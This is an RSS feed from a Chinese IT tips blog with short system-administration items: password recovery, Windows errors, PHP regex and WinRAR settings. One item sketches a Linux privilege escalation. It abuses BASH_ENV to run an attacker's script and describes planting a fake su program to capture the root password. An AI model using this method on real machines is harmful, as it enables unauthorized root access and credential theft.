<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>四维映像 &#187; 实用技巧</title>
	<atom:link href="http://www.i4wei.com/category/tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.i4wei.com</link>
	<description>The more a man learns, the more he sees his ignorance.</description>
	<lastBuildDate>Tue, 31 Aug 2010 18:51:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Up to 25% off for MS Certification Exams</title>
		<link>http://www.i4wei.com/2009/11/1511/</link>
		<comments>http://www.i4wei.com/2009/11/1511/#comments</comments>
		<pubDate>Tue, 17 Nov 2009 03:19:54 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1511</guid>
		<description><![CDATA[70-620 15% off 70-640 15% off 70-642 15% off 70-643 20% off 70-646 25% off 70-647 25% off Offer valid worldwide Offer Good until December 31, 2009 Customers must register, schedule and take their discounted exams by December 31, 2009. Detail information is here http://www.prometric.com/microsoft/careeroffer.htm Like Unlike 相关文章阅读微软免费杀软MSE会自动关闭Windows Defender微软7月13日终止对XP SP2提供IE安全更新微软:定期更改密码没用 或浪费时间金钱以色列黑客公布IE6漏洞攻击代码微软：Security Essentials 2010不是我们的杀软]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1511/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP正则表达式介绍</title>
		<link>http://www.i4wei.com/2009/11/1494/</link>
		<comments>http://www.i4wei.com/2009/11/1494/#comments</comments>
		<pubDate>Wed, 11 Nov 2009 14:08:28 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1494</guid>
		<description><![CDATA[PHP正则表达式介绍： 1.中括号 [0-9]匹配0-9 [a-z]匹配a-z小写字母 [A-Z]匹配A-Z大写字母 [a-zA-Z]匹配所有大小写字母 可以使用ascii来制定更多 2.量词 p+匹配至少一个含p的字符串 p*陪陪任何包含0个或多个p的字符串 p?匹配任何包含0个或一个p的字符串 p{2}匹配包含2个p的序列的字符串 p{2,3}匹配任何包含2个或3个的字符串 p$匹配任何以p结尾的字符串 ^p匹配任何以p开头的字符串 [^a-zA-Z]匹配任何不包含a-zA-Z的字符串 p.p匹配任何包含p、接下来是任何字符、再接下来有又是p的字符串 ^.{2}$匹配任何值包含2个字符的字符串 (.*)匹配任何被包围的字符串 p(hp)*匹配任何一个包含p,后面是多个或0个hp的字符串 3.预定义字符范围 [:alpha:]同[a-zA-Z] [:alnum:]同[a-zA-Z0-9] [:cntrl:]匹配控制字符，比如制表符，反斜杠，退格符 [:digit:]同[0-9] [:graph:]所有ASCII33~166范围内可以打印的字符 [:lower:]同[a-z] [:punct:]标点符号 [:upper:]同[A-Z] [:space:]空白字符，可以是空格、水平制表符、换行、换页、回车 [:xdigit:]十六进制符同[a-fA-F0-9] 4.ereg语句可以区分大小写来判断，下例 if (ereg(&#8220;([^a-z])&#8221;,&#8221;aaaaZaaaaaaa&#8221;)) echo &#8220;不全是小写的！&#8221;; ereg还可以返回一个数组 例如 $url=&#8220;http://www.i4wei.com&#8221;; $a=ereg(&#8220;^(http://www)\.([[:alnum:]]+)\.([[:alnum:]]+)&#8221;,$url,$regs); echo $regs[0],&#8221;&#60;br&#62;&#8220;; echo $regs[1],&#8221;&#60;br&#62;&#8220;; echo $regs[2],&#8221;&#60;br&#62;&#8220;; echo $regs[3],&#8221;&#60;br&#62;&#8220;; 得到 http://www.i4wei.com http://www i4wei com Like Unlike 相关文章阅读网管的困惑Upgrade Windows 2003 DC [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1494/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Server Log: Event ID 12317 Source SRMSVC</title>
		<link>http://www.i4wei.com/2009/11/1491/</link>
		<comments>http://www.i4wei.com/2009/11/1491/#comments</comments>
		<pubDate>Tue, 10 Nov 2009 04:02:05 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1491</guid>
		<description><![CDATA[Got an error in even log ton DC 2003 Google the problem and get a newsgroup post: &#8220;One of my staff members called Microsoft and they said that this is a bug that they are working on. You can turn the error off by going to the &#8220;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrmSvc\Settings&#8221; registry key and setting &#8220;DisableSearchDfs=1&#8243;&#8221;. 相关文章阅读微软免费杀软MSE会自动关闭Windows Defender微软7月13日终止对XP [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1491/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Uninstall Powershell 1.0</title>
		<link>http://www.i4wei.com/2009/11/1466/</link>
		<comments>http://www.i4wei.com/2009/11/1466/#comments</comments>
		<pubDate>Wed, 04 Nov 2009 12:43:12 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[PowerShell]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1466</guid>
		<description><![CDATA[When you try to install Powershell 2.0, you are prompted to uninstall other versions of Powershells before going ahead with the installation. But neither does powershell appear in Add/Remove programs nor is there an uninstall shortcut in the programs menu. To uninstall powershell 1.0 run add/remove programs (appwiz.cpl from Win+R) and click the “show updates” [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/11/1466/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Power Light Blinking on the Linksys WRT54G</title>
		<link>http://www.i4wei.com/2009/10/1435/</link>
		<comments>http://www.i4wei.com/2009/10/1435/#comments</comments>
		<pubDate>Sat, 24 Oct 2009 12:59:55 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Linksys]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1435</guid>
		<description><![CDATA[This problem is caused by the firmware not loading correctly. Follow the steps below to fix this: Note: This process must be done on a computer plugged into the router directly. Preparation You first need to establish a connection to the Internet and download firmware for your router. To get online, bypass the router and [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/10/1435/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Install a Secondary DNS in 2003 Domain</title>
		<link>http://www.i4wei.com/2009/10/1366/</link>
		<comments>http://www.i4wei.com/2009/10/1366/#comments</comments>
		<pubDate>Wed, 07 Oct 2009 14:56:18 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1366</guid>
		<description><![CDATA[Identify the Secondary Name Server Install DNS on the Secondary Name Server Configure the Forward Lookup Zone Configure the Reverse Lookup Zone Troubleshoot Identify the Secondary Name Server // < ![CDATA[// // ]]&#62;On the primary DNS server, identify an additional name server. To do this, follow these steps: Click Start, point to Administrative Tools, and [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/10/1366/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>自动登录Windows XP</title>
		<link>http://www.i4wei.com/2009/10/1362/</link>
		<comments>http://www.i4wei.com/2009/10/1362/#comments</comments>
		<pubDate>Mon, 05 Oct 2009 15:40:01 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1362</guid>
		<description><![CDATA[如果你给你的XP设置了密码，那么每次在进入XP桌面之前，都会出现一个用户登录界面，要求输入密码，这样加大了系统的安全性，也为多人共用一台电脑提供了方便，但如果只有你一个人使用，这样每次要输入密码，的确有点不大方便。要取消这个登录步骤，有两种方法： 第一种是修改注册表 这种方法比较麻烦，而且要求对注册表有一定的了解。 第1步：运行注册表编辑器，依次展开 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]， 然后在右侧窗口双击 &#8220;DefaultUserName&#8221;，接着输入你的登录用户名。如果没有 &#8220;DefaultUserName&#8221; 这一项，可以按鼠标右键选“编辑→新建→字符串值(s)→DefaultUserName”来添加这个项目，注意要区分大小写字母。 第2步：同样在该分支下，在右侧窗口中双击 &#8220;DefaultPassword&#8221;，然后在空白栏内输入你的密码。假如未发现 &#8220;DefaultPassword&#8221; 这一项，可按上面的步骤来新建该字符串值。 第3步：接下来在右侧窗口中双击 &#8220;AutoAdminLogon&#8221;，将数值设置为 &#8220;1&#8243;。假如未发现 &#8220;AutoAdminLogon&#8221; 这一项，可按上面的步骤来新建。 现在关闭注册表编辑器并重新启动电脑，就可以实现XP的自动登录了。 第二种方法比较简单 在 Windows XP 中单击“开始→运行”，输入 rundll32 netplwiz.dll,UsersRunDll（注意大小写及空格）， 按回车就会出现一个“用户账户”的操作窗口，如果你对 Windows 2000 比较熟悉的话，相信你应该知道怎么做了，取消对“要使用本机，用户必须输入用户名和密码”项的选择，点击“应用”。在接下来弹出的对话框中输入你想让电脑每次自动登录的用户名及其密码，下次启动时就可以实现XP的自动登录了。 Like Unlike 相关文章阅读微软免费杀软MSE会自动关闭Windows Defender微软7月13日终止对XP SP2提供IE安全更新微软:定期更改密码没用 或浪费时间金钱以色列黑客公布IE6漏洞攻击代码微软：Security Essentials 2010不是我们的杀软]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/10/1362/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disable the Hidden Administrative Shares</title>
		<link>http://www.i4wei.com/2009/09/1340/</link>
		<comments>http://www.i4wei.com/2009/09/1340/#comments</comments>
		<pubDate>Sun, 27 Sep 2009 02:10:31 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1340</guid>
		<description><![CDATA[By default Microsoft Windows system automatically creates hidden “administrative shares” for its logical drives C:, D: &#8230; with share names C$, D$ &#8230; It also creates the admin$ hidden share for to the \winnt or windows folder. These shares are designed for remote access support by domain administrators. You can manually delete these shares by [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1340/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>忘记root密码的解决办法</title>
		<link>http://www.i4wei.com/2009/09/1332/</link>
		<comments>http://www.i4wei.com/2009/09/1332/#comments</comments>
		<pubDate>Tue, 22 Sep 2009 18:53:54 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1332</guid>
		<description><![CDATA[1.在开机启动的时候能看到引导目录，用上下方向键选择你忘记密码的那个系统，然后按“e”。 2.接下来你可以看到如下图所示的画面，然后你再用上下键选择最新的内核，然后在按“e”。 3.执行完上步操作后可以看到下面的画面，在rhgb quiet最后加“空格”，然后键入“single”，或者直接输入数字的“1”并回车确定。 4.按“b”键，重新引导系统。 5.进入到系统后就可以用熟悉的passwd root来更改root的密码了。改完后reboot即可。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares Windows 2003 Error Event ID 7026]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1332/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 2003 Error Event ID 7026</title>
		<link>http://www.i4wei.com/2009/09/1277/</link>
		<comments>http://www.i4wei.com/2009/09/1277/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 13:08:31 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1277</guid>
		<description><![CDATA[An HP Proliant server running Microsoft Windows 2003 SP2 constantly has an error at system-start. The service is i8042prt and the Event ID is 7026 with the error “The following boot-start or system-start driver(s) failed to load: i8042prt”. I found a reference to this error from Microsoft. According to Microsoft, the i8042prt subkey stores data [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1277/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux提权一例</title>
		<link>http://www.i4wei.com/2009/09/1256/</link>
		<comments>http://www.i4wei.com/2009/09/1256/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 19:11:21 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1256</guid>
		<description><![CDATA[通常情况下，我们在执行bash脚本的时候，有一个执行过程，其中有一点比较重要就是如果BASH_ENV被设置的话，它就会执行BASH_ENV指向的脚本。 比如: [i4wei@localdomain ~]$ echo $BASH_ENV [i4wei@localdomain ~]$ export BASH_ENV=&#8221;/tmp/.bashrc&#8221; [i4wei@localdomain ~]$ echo $BASH_ENV /tmp/.bashrc [i4wei@localdomain ~]$ cat /tmp/.bashrc #!/bin/bash echo &#8220;Hello&#8221; [i4wei@localdomain ~]$ ls -l -rwxrwxr-x 1 i4wei i4wei 22 2009-08-07 05:54 test.sh [i4wei@localdomain ~]$ cat test.sh #!/bin/bash echo &#8220;i4wei.com&#8221; [xiaoyu@localdomain ~]$ ./test.sh Hello i4wei.com 看看怎么利用。 以前我们通常就是塞个fakesu.c进去。然后修改.bash_profile，建立个别名之类的东西。通过getpass来获得root密码，记录，然后去除别名&#8230;..关键是管理员使用正确密码登录的时候也是会提示一次密码错误。遇到傻点的管理员可能就放过这个细节了，再输入一遍密码就OK了。但是某些非人类admin会以最快的速度检查系统被入侵的迹象，外加啥啥啥，而且这种管理员改 root密码几乎是肯定的了。所以偷取下来的密码也没啥用处。恩，聪明的X客们一定知道我要做什么了。 看看环境变量su后在情况， [i4wei@localdomain ~]$ echo $BASH_ENV /tmp/.bashrc [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/09/1256/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>路由器密码恢复</title>
		<link>http://www.i4wei.com/2009/08/1170/</link>
		<comments>http://www.i4wei.com/2009/08/1170/#comments</comments>
		<pubDate>Thu, 13 Aug 2009 13:39:59 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Cisco]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1170</guid>
		<description><![CDATA[这里只是列举了现在使用非常广泛的2600和2500系列路由器密码的恢复方法，其中2600的方法对于2600系统之上的路由器也是大部分适用 的，2500的方法对于2500以下的路由器也是大部分适用的。其实上面两个系列路由器的密码恢复有个共通性，就是让路由器启动时跳过配置文件，直接启 动，最后再更改密码，最终实现恢复密码的目的。对于其它系列的路由器，大家就举一反三，自己尝试恢复吧！ 一、CISCO 2600系列 第一步：将路由器的控制口（Console口）和电脑的连接，依次单击“开始→所有程序→附件→超级终端”启动超级终端程序，设置参数为波特率 9600，数据位8，奇偶校验为无，停止位为1，流控选择无，打开路由器电源，在开机的一分钟之内按同时按下电脑上的Ctrl+Break组合键，使路由 器进入监控模式（Rom Monitor状态），这时提示符将显示为rommon1&#62;。 第二步：执行Confreg命令忽略配置文件，直接启动，然后重新配置寄存器。当屏幕提示“do you wish to change the configuration(y/n)”时，输入y，接下来的选项输入n。当屏幕提示enable“ignore system configuration information”(y/n)信息时输入y，接下来的选项输入n。 第三步：在提示符状态下输入Reset命令，回车执行，重新启动路由器。 第四步：重新启动路由器后进入特权模式，执行config mem命令保持之前的配置信息有效，然后就可以查看路由的器的密码了，拿到密码后要做什么不用我说了吧，赶紧更改成自己熟悉的密码吧。 二、CISCO 2500系列 整个过程同2600系列差不多，只是有些命令不一样。 第一步：同样将路由器的控制口与电脑的串口相连，启动计算机超级终端，设置其参数为波特率9600，数据位8，奇偶校验为无，停止位为1，流控选择 无。打开路由器电源，在开机一分钟之内按Ctrl+Break组合键，使路由器进入监控模式（Rom Monitor状态），提示符将显示为&#62;。 第二步：执行“e/s2000002”命令查看Configure –register的值，并且将该值记下。 第三步：执行“o/r0x0142”命令更新Configure –register值，使得路由器启动时跳过配置文件，也就是直接启动，从而使密码不起作用。 第三步：重新启动路由器。 第四步：路由器启动后进入特权模式，执行“Config mem”命令，保持之前的配置信息有效。 第五步：这时就可以按正常操作查看原来的密码了，当然这里需要做的事就是更改密码为自己熟悉的，不易忘记的。 第六步：将“configure -register”值还原，然后重新启动路由器，然后设备即可恢复正常工作状态。 依次执行“Configure -register 0x（之间记下的Configure –register值）、write、reload”这三条命令即可结束密码恢复工作。 Like Unlike 相关文章阅读New CCNP – Official Announcement思科首台太空路由器在轨测试成功CISCO等四家公司网络设备产品被指存安全漏洞微软思科终修正TCP DoS漏洞CCIE+MBA=？ 思科推出新顶级认证CCA]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/08/1170/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows中EFS加密功能妙用</title>
		<link>http://www.i4wei.com/2009/08/1107/</link>
		<comments>http://www.i4wei.com/2009/08/1107/#comments</comments>
		<pubDate>Thu, 06 Aug 2009 13:20:00 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1107</guid>
		<description><![CDATA[从windows 2000开始，微软为我们提供了一个叫做EFS的加密功能，通过该功能，我们可以将保存在NTFS分区上的文件加密，让别人无法打开。虽然该功能已经面世很长时间了，不过很多人因为对这个功能不了解，导致了很多数据丢失的情况发生。 其实从设计上来看，EFS加密是相当安全的一种公钥加密方式，只要别人无从获得你的私钥，那么以目前的技术水平来看是完全无法破解的。和其他加密软件相比，EFS最大的优势在于和系统紧密集成，同时对于用户来说，整个过程是透明的。例如，用户A加密了一个文件，那么就只有用户A可以打开这个文件。当用户A登录到Windows的时候，系统已经验证了用户A的合法性，这种情况下，用户A在Windows资源管理器中可以直接打开自己加密的文件，并进行编辑，在保存的时候，编辑后的内容会被自动加密并合并到文件中。在这个过程中，该用户并不需要重复输入自己的密码，或者手工进行解密和重新加密的操作,因此EFS在使用时非常便捷。 完全支持EFS加密和解密的操作系统包括Windows 2000的所有版本、Windows XP专业版(Professional)、Windows Vista商业版(Business)、企业版(Enterprise)和旗舰版(Ultimate)。Windows Vista家庭基础版(Home Basic)和家庭高级版(Home Premium)只能在有密钥的情况下打开被EFS加密的文件，但无法加密新的文件。 下面以Windows Vista旗舰版中的操作为例进行说明，同时这些操作也适用于Windows Vista商业版和企业版。其他支持EFS的Windows操作系统在细节上可能会有所不同。 文件的加密和解密是很简单的，我们只需要在Windows资源管理器中用鼠标右键单击想要加密或解密的文件或文件夹，选择“属性”，打开“属性”对话框的“常规”选项卡，接着单击“高级”按钮，打开“高级属性”对话框。 打开“高级属性”对话框，对文件进行加密或解密 如果希望加密该文件或文件夹，请选中“加密内容以便保护数据”;如果希望解密文件或文件夹，请反选“加密内容以便保护数据”，然后单击“确定”即可;如果选择加密或解密的对象是一个包含子文件夹或文件的文件夹，那么单击“确定”后，我们将看到“确认属性更改”对话框。 在“确认属性更改”对话框中，选择加密或解密操作的应用范围 在这里，我们可以决定将该属性更改应用给哪些对象。例如，如果希望同时加密或解密该文件夹中包含的子文件夹和文件，可以选择“将更改应用于此文件夹、子文件夹和文件”;如果只希望加密或解密该文件夹，则可以选择“仅将更改应用于此文件夹”。 默认情况下，被加密的文件或文件夹在Windows资源管理器中会显示为绿色，提醒我们注意。如果不希望使用这一特性，那么可以按照下列方法更改默认设置： 1. 打开“计算机”——“我的电脑”，如果是Windows Vista，请按下Alt键，打开菜单栏。 2. 在菜单栏上依次单击“工具”　“文件夹选项”，打开“文件夹选项”对话框，打开“查看”选项卡。 3. 高级设置列表中，取消对“用彩色显示加密或压缩的NTFS文件”这个选项的选择。 4. 单击“确定”。 EFS是一种公钥加密体系，因此加密和解密操作都需要证书(也叫做密钥)的参与。很多人使用EFS加密的时候都吃了亏。例如在系统中用EFS加密了文件，某天因为一些原因直接重装了操作系统，并创建了和老系统一样用户名和密码的帐户，但发现自己之前曾经加密过的文件都打不开了。 Like Unlike 相关文章阅读微软免费杀软MSE会自动关闭Windows Defender微软7月13日终止对XP SP2提供IE安全更新微软:定期更改密码没用 或浪费时间金钱以色列黑客公布IE6漏洞攻击代码微软：Security Essentials 2010不是我们的杀软]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/08/1107/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>OpenDNS &#8211; a Solution For DNS Hijacking</title>
		<link>http://www.i4wei.com/2009/07/1025/</link>
		<comments>http://www.i4wei.com/2009/07/1025/#comments</comments>
		<pubDate>Wed, 29 Jul 2009 15:05:40 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[DNS]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=1025</guid>
		<description><![CDATA[OpenDNS 是一家2006年成立的免费DNS解析服务提供商。我们大多网络用户上网所使用的都是ISP预设DNS服务器，现在所要做的就是在网络设置里将DNS改成OpenDNS提供的DNS服务器，就不用为所谓的DNS劫持发愁了。你也可以开设一个OpenDNS账户以便查看DNS使用状态。 OpenDNS 提供 DNS 地址： 首选 DNS 服务器： 208.67.222.222 备用 DNS 服务器： 208.67.220.220 下面简单介绍一下OpenDNS能给我们带来的具体好处有哪些。 1. OpenDNS大量的域名暂存功能，这可以大大缩短 DNS 检索时间，加快页面检索速度 2. 从OpenDNS组建开始，他们就建立了第一个反钓鱼网站资料库，这就是说那些以欺诈为目的的站点，将被有效阻隔，这其中也包括大量的恶意站点，就是给你机器中点木马病毒啥的，专干这些活的站点。 3. 网址自动纠错功能，譬如你输错了网址 ,OpenDNS会自动帮你纠正过来。 只此三点，很性感很诱惑，是预设DNS不能够为你提供的，总而言之，换了OpenDNS之后，你的网络将会更快速、更安全、更人性！ Like Unlike 随机文章阅读微软:定期更改密码没用 或浪费时间金钱Breaking Off &#8211; 斯诺克的开球相册更新apache.org被黑Linux发行版的名称含义]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/1025/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Autimatic Renaming Files Using a Batch File</title>
		<link>http://www.i4wei.com/2009/07/980/</link>
		<comments>http://www.i4wei.com/2009/07/980/#comments</comments>
		<pubDate>Thu, 16 Jul 2009 13:31:48 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=980</guid>
		<description><![CDATA[Everyday I need to rename the backup file with date stamp in the file name, here is the batch .bat file, and I use scheduled task to run it. @ECHO OFF FOR /f &#8220;tokens=2 delims= &#8221; %%D in (&#8216;echo %DATE:/=%&#8217;) DO SET DATEN=%%D IF EXIST backup.txt RENAME backup.txt backup-%DATEN%.txt The backup file will rename to [...]]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/980/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WinRAR的三种安全战术</title>
		<link>http://www.i4wei.com/2009/07/968/</link>
		<comments>http://www.i4wei.com/2009/07/968/#comments</comments>
		<pubDate>Sat, 11 Jul 2009 14:58:35 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=968</guid>
		<description><![CDATA[一、拒绝利用WinRAR捆绑的恶意程序 不少木马、硬盘炸弹等恶意程序就是利用WinRAR自解压程序捆绑程序来伪装自己。那如何区别正常的自解压文件和捆绑了恶意程序的自解压文件呢？只要能发现自释放文件里面隐藏有多个文件，特别是多个可执行文件，就可以判定其中含有恶意程序。那么怎样才能知道自释放文件中含有几个文件，是哪些文件呢？ 一个简单的识别方法是：用鼠标右击WinRAR自释放文件，在弹出菜单中选择“属性”，在“属性”对话框中你会发现较之普通的EXE文件多出两个标 签，分别是：“档案文件”和“注释”。单击“注释”标签，看其中的注释内容，你就会发现里面含有哪些文件了，这样就可以做到心中有数，这是识别用 WinRAR捆绑恶意程序文件的最好方法。 还有一个防范恶意程序方法，就是遇到WinRAR自解压程序不要直接运行，而是选择右键菜单中的“用WinRAR打开”，这样你就会发现该文件中到底有什么了。 二、压缩文件密码自动加 当用WinRAR创建很多个加密压缩包时，需要一个一个地来设置密码，这样效率非常低。其实我们可以利用WinRAR的设置默认的压缩选项，在生成压缩文件的同时自动加上一个自已设定的密码。 点击WinRAR菜单中的“选项→设置”，选择“压缩”选项卡。点击“创建默认配置”按钮，然后选择“高级”选项卡，再单击“设置密码”按钮，输入自己的密码，还可根据需要来选择是否加密文件名。 连续按两次确定，出现询问是否保存密码时按“是”保存设置即可。这样设置后，每次使用右键快捷菜单来创建压缩文件时，都会自动地添加你输入的默认密 码，节省了不少宝贵的时间。所有压缩文件创建完成后，再按以上步骤，即单击“选项→设置→压缩→创建默认配置→高级→设置密码”，将密码保持为空，单击“ 确定”。这样，无论别人在你的电脑还是其他电脑打开你的压缩文件时都必须输入你刚才的密码才能打开。 三、轻松禁用WinRAR设置 如果不想让别人操作你的WinRAR 主菜单，我们可以写一段注册表文件。首先打开记事本，系统是Windows 2000/XP/2003的请输入如下代码： Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\WinRAR\Policy] Menu=dword：00000000 Settings=dword：00000000 其中的Menu项设置可为0/1，用来禁止/允许WinRAR 主菜单，而Settings项设置也可为0/1，用来禁止/允许“设置”和“选择工具栏按钮”对话框。 把这个文本文档另存为Nowinrar.reg，再双击把此REG文件导入注册表。现在启动WinRAR，主菜单不见了，按“Ctrl+S”组合键 也无法调出“设置”对话框。要恢复就把上面代码中的00000000改为00000001，另存为winrar.reg。双击该文件导入注册表即可恢复菜 单，并允许使用“设置”窗口。 Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/968/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Howto: 注册@msn.com邮箱地址</title>
		<link>http://www.i4wei.com/2009/07/940/</link>
		<comments>http://www.i4wei.com/2009/07/940/#comments</comments>
		<pubDate>Mon, 06 Jul 2009 20:19:32 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=940</guid>
		<description><![CDATA[要注册Microsoft Passport邮箱时，注册页面只能选择hotmail.com或者live.com，若要注册msn.com的email地址，可以用以下的地址进行注册： https://accountservices.passport.net/reg.srf?ns=msn.com Like Unlike 相关文章阅读PHP正则表达式介绍网管的困惑Upgrade Windows 2003 DC to Windows Server 2008Disable the Hidden Administrative Shares 忘记root密码的解决办法]]></description>
		<wfw:commentRss>http://www.i4wei.com/2009/07/940/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>三种方法恢复MySQL密码</title>
		<link>http://www.i4wei.com/2009/07/922/</link>
		<comments>http://www.i4wei.com/2009/07/922/#comments</comments>
		<pubDate>Sun, 05 Jul 2009 03:04:08 +0000</pubDate>
		<dc:creator>i4wei</dc:creator>
				<category><![CDATA[实用技巧]]></category>
		<category><![CDATA[Mysql]]></category>

		<guid isPermaLink="false">http://www.i4wei.com/?p=922</guid>
